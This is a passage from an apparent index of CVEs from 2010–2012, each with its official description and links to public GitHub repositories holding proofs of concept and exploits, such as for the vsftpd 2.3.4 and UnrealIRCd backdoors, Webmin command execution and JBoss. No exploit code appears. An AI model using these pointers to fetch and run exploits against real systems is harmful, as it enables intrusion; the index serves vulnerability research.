### CVE-2012-2688 (2012-07-20)
Unspecified vulnerability in the _php_stream_scandir function in the stream implementation in PHP before 5.3.15 and 5.4.x before 5.4.5 has unknown impact and remote attack vectors, related to an "overflow."
- [shelld3v/CVE-2012-2688](https://github.com/shelld3v/CVE-2012-2688)
### CVE-2012-2982 (2012-09-11)
file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.
- [cd6629/CVE-2012-2982-Python-PoC](https://github.com/cd6629/CVE-2012-2982-Python-PoC)
- [OstojaOfficial/CVE-2012-2982](https://github.com/OstojaOfficial/CVE-2012-2982)
- [AlexJS6/CVE-2012-2982_Python](https://github.com/AlexJS6/CVE-2012-2982_Python)
- [Ari-Weinberg/CVE-2012-2982](https://github.com/Ari-Weinberg/CVE-2012-2982)
- [JohnHammond/CVE-2012-2982](https://github.com/JohnHammond/CVE-2012-2982)
- [R00tendo/CVE-2012-2982](https://github.com/R00tendo/CVE-2012-2982)
- [blu3ming/CVE-2012-2982](https://github.com/blu3ming/CVE-2012-2982)
- [0xF331-D3AD/CVE-2012-2982](https://github.com/0xF331-D3AD/CVE-2012-2982)
- [0xTas/CVE-2012-2982](https://github.com/0xTas/CVE-2012-2982)
- [LeDucKhiem/CVE-2012-2982](https://github.com/LeDucKhiem/CVE-2012-2982)
- [CpyRe/CVE-2012-2982](https://github.com/CpyRe/CVE-2012-2982)
- [Shadow-Spinner/CVE-2012-2982_python](https://github.com/Shadow-Spinner/CVE-2012-2982_python)
- [elliotosama/CVE-2012-2982](https://github.com/elliotosama/CVE-2012-2982)
### CVE-2012-3137 (2012-09-21)
The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to obtain the session key and salt for arbitrary users, which leaks information about the cryptographic hash and makes it easier to conduct brute force password guessing attacks, aka "stealth password cracking vulnerability."
- [hantwister/o5logon-fetch](https://github.com/hantwister/o5logon-fetch)
- [r1-/cve-2012-3137](https://github.com/r1-/cve-2012-3137)
### CVE-2012-3153 (2012-10-16)
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the PARSEQUERY function allows remote attackers to obtain database credentials via reports/rwservlet/parsequery, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3152 to execute arbitrary code by uploading a .jsp file.
- [Mekanismen/pwnacle-fusion](https://github.com/Mekanismen/pwnacle-fusion)
### CVE-2012-3716 (2012-09-20)
CoreText in Apple Mac OS X 10.7.x before 10.7.5 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write or read) via a crafted text glyph.
- [d4rkcat/killosx](https://github.com/d4rkcat/killosx)
### CVE-2012-4220 (2012-11-30)
diagchar_core.c in the Qualcomm Innovation Center (QuIC) Diagnostics (aka DIAG) kernel-mode driver for Android 2.3 through 4.2 allows attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference) via an application that uses crafted arguments in a local diagchar_ioctl call.
- [hiikezoe/diaggetroot](https://github.com/hiikezoe/diaggetroot)
- [poliva/root-zte-open](https://github.com/poliva/root-zte-open)
### CVE-2012-4431 (2012-12-19)
org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
- [imjdl/CVE-2012-4431](https://github.com/imjdl/CVE-2012-4431)
### CVE-2012-4681 (2012-08-28)
Multiple vulnerabilities in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allow remote attackers to execute arbitrary code via a crafted applet that bypasses SecurityManager restrictions by (1) using com.sun.beans.finder.ClassFinder.findClass and leveraging an exception with the forName method to access restricted classes from arbitrary packages such as sun.awt.SunToolkit, then (2) using "reflection with a trusted immediate caller" to leverage the getField method to access and modify private fields, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class.
- [benjholla/CVE-2012-4681-Armoring](https://github.com/benjholla/CVE-2012-4681-Armoring)
- [ZH3FENG/PoCs-CVE_2012_4681](https://github.com/ZH3FENG/PoCs-CVE_2012_4681)
### CVE-2012-4792 (2012-12-30)
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.
- [WizardVan/CVE-2012-4792](https://github.com/WizardVan/CVE-2012-4792)
### CVE-2012-4869 (2012-09-06)
The callme_startcall function in recordings/misc/callme_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.
- [bitc0de/Elastix-Remote-Code-Execution](https://github.com/bitc0de/Elastix-Remote-Code-Execution)
- [0xConstant/CVE-2012-4869](https://github.com/0xConstant/CVE-2012-4869)
### CVE-2012-4929 (2012-09-15)
The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.
- [mpgn/CRIME-poc](https://github.com/mpgn/CRIME-poc)
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)
### CVE-2012-5106 (2014-06-20)
Stack-based buffer overflow in FreeFloat FTP Server 1.0 allows remote authenticated users to execute arbitrary code via a long string in a PUT command.
- [war4uthor/CVE-2012-5106](https://github.com/war4uthor/CVE-2012-5106)
### CVE-2012-5321 (2012-10-08)
tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection."
- [Cappricio-Securities/CVE-2012-5321](https://github.com/Cappricio-Securities/CVE-2012-5321)
### CVE-2012-5519 (2012-11-20)
CUPS 1.4.4, when running in certain Linux distributions such as Debian GNU/Linux, stores the web interface administrator key in /var/run/cups/certs/0 using certain permissions, which allows local users in the lpadmin group to read or write arbitrary files as root by leveraging the web interface.
- [p1ckzi/CVE-2012-5519](https://github.com/p1ckzi/CVE-2012-5519)
### CVE-2012-5575 (2013-08-19)
Apache CXF 2.5.x before 2.5.10, 2.6.x before CXF 2.6.7, and 2.7.x before CXF 2.7.4 does not verify that a specified cryptographic algorithm is allowed by the WS-SecurityPolicy AlgorithmSuite definition before decrypting, which allows remote attackers to force CXF to use weaker cryptographic algorithms than intended and makes it easier to decrypt communications, aka "XML Encryption backwards compatibility attack."
- [tafamace/CVE-2012-5575](https://github.com/tafamace/CVE-2012-5575)
### CVE-2012-5613 (2012-12-03)
MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
- [Hood3dRob1n/MySQL-Fu.rb](https://github.com/Hood3dRob1n/MySQL-Fu.rb)
- [w4fz5uck5/UDFPwn-CVE-2012-5613](https://github.com/w4fz5uck5/UDFPwn-CVE-2012-5613)
### CVE-2012-5664
- [phusion/rails-cve-2012-5664-test](https://github.com/phusion/rails-cve-2012-5664-test)
### CVE-2012-5958 (2013-01-31)
Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.
- [lochiiconnectivity/vulnupnp](https://github.com/lochiiconnectivity/vulnupnp)
### CVE-2012-5960 (2013-01-31)
Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.
- [finn79426/CVE-2012-5960-PoC](https://github.com/finn79426/CVE-2012-5960-PoC)
### CVE-2012-6066 (2012-12-04)
freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to bypass authentication via a crafted session, as demonstrated by an OpenSSH client with modified versions of ssh.c and sshconnect2.c.
- [bongbongco/CVE-2012-6066](https://github.com/bongbongco/CVE-2012-6066)
### CVE-2012-6636 (2014-03-03)
The Android API before 17 does not properly restrict the WebView.addJavascriptInterface method, which allows remote attackers to execute arbitrary methods of Java objects by using the Java Reflection API within crafted JavaScript code that is loaded into the WebView component in an application targeted to API level 16 or earlier, a related issue to CVE-2013-4710.
- [xckevin/AndroidWebviewInjectDemo](https://github.com/xckevin/AndroidWebviewInjectDemo)
- [Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability](https://github.com/Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability)
## 2011
### CVE-2011-0104 (2011-04-13)
Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka "Excel Buffer Overwrite Vulnerability."
- [Sunqiz/CVE-2011-0104-reproduction](https://github.com/Sunqiz/CVE-2011-0104-reproduction)
### CVE-2011-0228 (2011-08-29)
The Data Security component in Apple iOS before 4.2.10 and 4.3.x before 4.3.5 does not check the basicConstraints parameter during validation of X.509 certificate chains, which allows man-in-the-middle attackers to spoof an SSL server by using a non-CA certificate to sign a certificate for an arbitrary domain.
- [jan0/isslfix](https://github.com/jan0/isslfix)
### CVE-2011-1237 (2011-04-13)
Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability."
- [BrunoPujos/CVE-2011-1237](https://github.com/BrunoPujos/CVE-2011-1237)
### CVE-2011-1249 (2011-06-16)
The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."
- [Madusanka99/OHTS](https://github.com/Madusanka99/OHTS)
- [h3xcr4ck3r/CVE-2011-1249](https://github.com/h3xcr4ck3r/CVE-2011-1249)
### CVE-2011-1473 (2012-06-16)
OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment
- [zjt674449039/cve-2011-1473](https://github.com/zjt674449039/cve-2011-1473)
- [XDLDCG/bash-tls-reneg-attack](https://github.com/XDLDCG/bash-tls-reneg-attack)
### CVE-2011-1475 (2011-04-08)
The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
- [samaujs/CVE-2011-1475](https://github.com/samaujs/CVE-2011-1475)
### CVE-2011-1485 (2011-05-31)
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
- [Pashkela/CVE-2011-1485](https://github.com/Pashkela/CVE-2011-1485)
### CVE-2011-1571 (2011-05-07)
Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
- [noobpk/CVE-2011-1571](https://github.com/noobpk/CVE-2011-1571)
### CVE-2011-1575 (2011-05-23)
The STARTTLS implementation in ftp_parser.c in Pure-FTPd before 1.0.30 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted FTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
- [masamoon/cve-2011-1575-poc](https://github.com/masamoon/cve-2011-1575-poc)
### CVE-2011-1720 (2011-05-13)
The SMTP server in Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4, and 2.8.x before 2.8.3, when certain Cyrus SASL authentication methods are enabled, does not create a new server handle after client authentication fails, which allows remote attackers to cause a denial of service (heap memory corruption and daemon crash) or possibly execute arbitrary code via an invalid AUTH command with one method followed by an AUTH command with a different method.
- [nbeguier/postfix_exploit](https://github.com/nbeguier/postfix_exploit)
### CVE-2011-1974 (2011-08-10)
NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability."
- [hittlle/CVE-2011-1974-PoC](https://github.com/hittlle/CVE-2011-1974-PoC)
### CVE-2011-2461 (2011-12-01)
Cross-site scripting (XSS) vulnerability in the Adobe Flex SDK 3.x and 4.x before 4.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the loading of modules from different domains.
- [ikkisoft/ParrotNG](https://github.com/ikkisoft/ParrotNG)
- [u-maxx/magento-swf-patched-CVE-2011-2461](https://github.com/u-maxx/magento-swf-patched-CVE-2011-2461)
- [edmondscommerce/CVE-2011-2461_Magento_Patch](https://github.com/edmondscommerce/CVE-2011-2461_Magento_Patch)
### CVE-2011-2523 (2019-11-27)
vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
- [HerculesRD/vsftpd2.3.4PyExploit](https://github.com/HerculesRD/vsftpd2.3.4PyExploit)
- [nobodyatall648/CVE-2011-2523](https://github.com/nobodyatall648/CVE-2011-2523)
- [Gr4ykt/CVE-2011-2523](https://github.com/Gr4ykt/CVE-2011-2523)
- [padsalatushal/CVE-2011-2523](https://github.com/padsalatushal/CVE-2011-2523)
- [MFernstrom/OffensivePascal-CVE-2011-2523](https://github.com/MFernstrom/OffensivePascal-CVE-2011-2523)
- [0xSojalSec/-CVE-2011-2523](https://github.com/0xSojalSec/-CVE-2011-2523)
- [0xSojalSec/CVE-2011-2523](https://github.com/0xSojalSec/CVE-2011-2523)
- [XiangSi-Howard/CTF---CVE-2011-2523](https://github.com/XiangSi-Howard/CTF---CVE-2011-2523)
- [cowsecurity/CVE-2011-2523](https://github.com/cowsecurity/CVE-2011-2523)
- [Lynk4/CVE-2011-2523](https://github.com/Lynk4/CVE-2011-2523)
- [vaishnavucv/CVE-2011-2523](https://github.com/vaishnavucv/CVE-2011-2523)
- [chleba124/vsftpd-exploit](https://github.com/chleba124/vsftpd-exploit)
- [4m3rr0r/CVE-2011-2523-poc](https://github.com/4m3rr0r/CVE-2011-2523-poc)
- [Shubham-2k1/Exploit-CVE-2011-2523](https://github.com/Shubham-2k1/Exploit-CVE-2011-2523)
- [Tenor-Z/SmileySploit](https://github.com/Tenor-Z/SmileySploit)
- [R4idB0Y/CVE-2011-2523-PoC](https://github.com/R4idB0Y/CVE-2011-2523-PoC)
- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research)
- [Gill-Singh-A/vsFTP-2.3.4-Remote-Root-Shell-Exploit](https://github.com/Gill-Singh-A/vsFTP-2.3.4-Remote-Root-Shell-Exploit)
- [everythingBlackkk/vsFTPd-Backdoor-Exploit-CVE-2011-2523-](https://github.com/everythingBlackkk/vsFTPd-Backdoor-Exploit-CVE-2011-2523-)
### CVE-2011-2894 (2011-10-04)
Spring Framework 3.0.0 through 3.0.5, Spring Security 3.0.0 through 3.0.5 and 2.0.0 through 2.0.6, and possibly other versions deserialize objects from untrusted sources, which allows remote attackers to bypass intended security restrictions and execute untrusted code by (1) serializing a java.lang.Proxy instance and using InvocationHandler, or (2) accessing internal AOP interfaces, as demonstrated using deserialization of a DefaultListableBeanFactory instance to execute arbitrary commands via the java.lang.Runtime class.
- [pwntester/SpringBreaker](https://github.com/pwntester/SpringBreaker)
### CVE-2011-3026 (2012-02-16)
Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation.
- [argp/cve-2011-3026-firefox](https://github.com/argp/cve-2011-3026-firefox)
### CVE-2011-3192 (2011-08-29)
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
- [tkisason/KillApachePy](https://github.com/tkisason/KillApachePy)
- [limkokholefork/CVE-2011-3192](https://github.com/limkokholefork/CVE-2011-3192)
- [stcmjp/cve-2011-3192](https://github.com/stcmjp/cve-2011-3192)
- [futurezayka/CVE-2011-3192](https://github.com/futurezayka/CVE-2011-3192)
### CVE-2011-3368 (2011-10-05)
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
- [SECFORCE/CVE-2011-3368](https://github.com/SECFORCE/CVE-2011-3368)
- [colorblindpentester/CVE-2011-3368](https://github.com/colorblindpentester/CVE-2011-3368)
### CVE-2011-3389 (2011-09-06)
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
- [mpgn/BEAST-PoC](https://github.com/mpgn/BEAST-PoC)
### CVE-2011-3556 (2011-10-19)
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI, a different vulnerability than CVE-2011-3557.
- [sk4la/cve_2011_3556](https://github.com/sk4la/cve_2011_3556)
### CVE-2011-3872 (2011-10-27)
Puppet 2.6.x before 2.6.12 and 2.7.x before 2.7.6, and Puppet Enterprise (PE) Users 1.0, 1.1, and 1.2 before 1.2.4, when signing an agent certificate, adds the Puppet master's certdnsnames values to the X.509 Subject Alternative Name field of the certificate, which allows remote attackers to spoof a Puppet master via a man-in-the-middle (MITM) attack against an agent that uses an alternate DNS name for the master, aka "AltNames Vulnerability."
- [puppetlabs-toy-chest/puppetlabs-cve20113872](https://github.com/puppetlabs-toy-chest/puppetlabs-cve20113872)
### CVE-2011-4107 (2011-11-17)
The simplexml_load_string function in the XML import plug-in (libraries/import/xml.php) in phpMyAdmin 3.4.x before 3.4.7.1 and 3.3.x before 3.3.10.5 allows remote authenticated users to read arbitrary files via XML data containing external entity references, aka an XML external entity (XXE) injection attack.
- [SECFORCE/CVE-2011-4107](https://github.com/SECFORCE/CVE-2011-4107)
### CVE-2011-4862 (2011-12-25)
Buffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3 through 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2 and earlier, Heimdal 1.5.1 and earlier, GNU inetutils, and possibly other products allows remote attackers to execute arbitrary code via a long encryption key, as exploited in the wild in December 2011.
- [hdbreaker/GO-CVE-2011-4862](https://github.com/hdbreaker/GO-CVE-2011-4862)
- [lol-fi/cve-2011-4862](https://github.com/lol-fi/cve-2011-4862)
- [kpawar2410/CVE-2011-4862](https://github.com/kpawar2410/CVE-2011-4862)
### CVE-2011-4919 (2019-11-19)
mpack 1.6 has information disclosure via eavesdropping on mails sent by other users
- [hartwork/mpacktrafficripper](https://github.com/hartwork/mpacktrafficripper)
### CVE-2011-5331 (2019-11-18)
Distributed Ruby (aka DRuby) 1.8 mishandles instance_eval.
- [tomquinn8/CVE-2011-5331](https://github.com/tomquinn8/CVE-2011-5331)
## 2010
### CVE-2010-0219 (2010-10-18)
Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
- [veritas-rt/CVE-2010-0219](https://github.com/veritas-rt/CVE-2010-0219)
### CVE-2010-0232 (2010-01-21)
The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability."
- [azorfus/CVE-2010-0232](https://github.com/azorfus/CVE-2010-0232)
### CVE-2010-0426 (2010-02-24)
sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4, when a pseudo-command is enabled, permits a match between the name of the pseudo-command and the name of an executable file in an arbitrary directory, which allows local users to gain privileges via a crafted executable file, as demonstrated by a file named sudoedit in a user's home directory.
- [t0kx/privesc-CVE-2010-0426](https://github.com/t0kx/privesc-CVE-2010-0426)
- [cved-sources/cve-2010-0426](https://github.com/cved-sources/cve-2010-0426)
- [g1vi/CVE-2010-0426](https://github.com/g1vi/CVE-2010-0426)
### CVE-2010-0738 (2010-04-28)
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
- [ChristianPapathanasiou/jboss-autopwn](https://github.com/ChristianPapathanasiou/jboss-autopwn)
- [gitcollect/jboss-autopwn](https://github.com/gitcollect/jboss-autopwn)
### CVE-2010-1205 (2010-06-30)
Buffer overflow in pngpread.c in libpng before 1.2.44 and 1.4.x before 1.4.3, as used in progressive applications, might allow remote attackers to execute arbitrary code via a PNG image that triggers an additional data row.
- [mk219533/CVE-2010-1205](https://github.com/mk219533/CVE-2010-1205)
### CVE-2010-1240 (2010-04-05)
Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message.
- [Jasmoon99/Embedded-PDF](https://github.com/Jasmoon99/Embedded-PDF)
- [omarothmann/Embedded-Backdoor-Connection](https://github.com/omarothmann/Embedded-Backdoor-Connection)
- [asepsaepdin/CVE-2010-1240](https://github.com/asepsaepdin/CVE-2010-1240)
### CVE-2010-1411 (2010-06-17)
Multiple integer overflows in the Fax3SetupState function in tif_fax3.c in the FAX3 decoder in LibTIFF before 3.9.3, as used in ImageIO in Apple Mac OS X 10.5.8 and Mac OS X 10.6 before 10.6.4, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF file that triggers a heap-based buffer overflow.
- [MAVProxyUser/httpfuzz-robomiller](https://github.com/MAVProxyUser/httpfuzz-robomiller)
### CVE-2010-1622 (2010-06-21)
SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.
- [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc)
- [strainerart/Spring4Shell](https://github.com/strainerart/Spring4Shell)
- [HandsomeCat00/Spring-CVE-2010-1622](https://github.com/HandsomeCat00/Spring-CVE-2010-1622)
- [E-bounce/cve-2010-1622_learning_environment](https://github.com/E-bounce/cve-2010-1622_learning_environment)
### CVE-2010-1938 (2010-05-28)
Off-by-one error in the __opiereadrec function in readrec.c in libopie in OPIE 2.4.1-test1 and earlier, as used on FreeBSD 6.4 through 8.1-PRERELEASE and other platforms, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long username, as demonstrated by a long USER command to the FreeBSD 8.0 ftpd.
- [Nexxus67/cve-2010-1938](https://github.com/Nexxus67/cve-2010-1938)
### CVE-2010-2075 (2010-06-15)
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.
- [MFernstrom/OffensivePascal-CVE-2010-2075](https://github.com/MFernstrom/OffensivePascal-CVE-2010-2075)
- [chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution](https://github.com/chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution)
- [FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1](https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1)
- [JoseLRC97/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution](https://github.com/JoseLRC97/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution)
### CVE-2010-2387 (2012-12-21)
vicious-extensions/ve-misc.c in GNOME Display Manager (gdm) 2.20.x before 2.20.11, when GDM debug is enabled, logs the user password when it contains invalid UTF8 encoded characters, which might allow local users to gain privileges by reading the information from syslog logs.
- [LogSec/CVE-2010-2387](https://github.com/LogSec/CVE-2010-2387)
### CVE-2010-2553 (2010-08-11)
The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability."
- [Sunqiz/cve-2010-2553-reproduction](https://github.com/Sunqiz/cve-2010-2553-reproduction)
### CVE-2010-3124 (2010-08-26)
Untrusted search path vulnerability in bin/winvlc.c in VLC Media Player 1.1.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wintab32.dll that is located in the same folder as a .mp3 file.
- [Nhom6KTLT/CVE-2010-3124](https://github.com/Nhom6KTLT/CVE-2010-3124)
- [KOBUKOVUI/DLL_Injection_On_VLC](https://github.com/KOBUKOVUI/DLL_Injection_On_VLC)
### CVE-2010-3332 (2010-09-22)
Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."
- [bongbongco/MS10-070](https://github.com/bongbongco/MS10-070)
### CVE-2010-3333 (2010-11-10)
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
- [whiteHat001/cve-2010-3333](https://github.com/whiteHat001/cve-2010-3333)
- [Sunqiz/CVE-2010-3333-reproduction](https://github.com/Sunqiz/CVE-2010-3333-reproduction)
### CVE-2010-3490 (2010-09-28)
Directory traversal vulnerability in page.recordings.php in the System Recordings component in the configuration interface in FreePBX 2.8.0 and earlier allows remote authenticated administrators to create arbitrary files via a .. (dot dot) in the usersnum parameter to admin/config.php, as demonstrated by creating a .php file under the web root.
- [moayadalmalat/CVE-2010-3490](https://github.com/moayadalmalat/CVE-2010-3490)
### CVE-2010-3600 (2011-01-19)
Unspecified vulnerability in the Client System Analyzer component in Oracle Database Server 11.1.0.7 and 11.2.0.1 and Enterprise Manager Grid Control 10.2.0.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from a reliable third party coordinator that this issue involves an exposed JSP script that accepts XML uploads in conjunction with NULL bytes in an unspecified parameter that allow execution of arbitrary code.
- [LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2](https://github.com/LAITRUNGMINHDUC/CVE-2010-3600-PythonHackOracle11gR2)
### CVE-2010-3847 (2011-01-07)
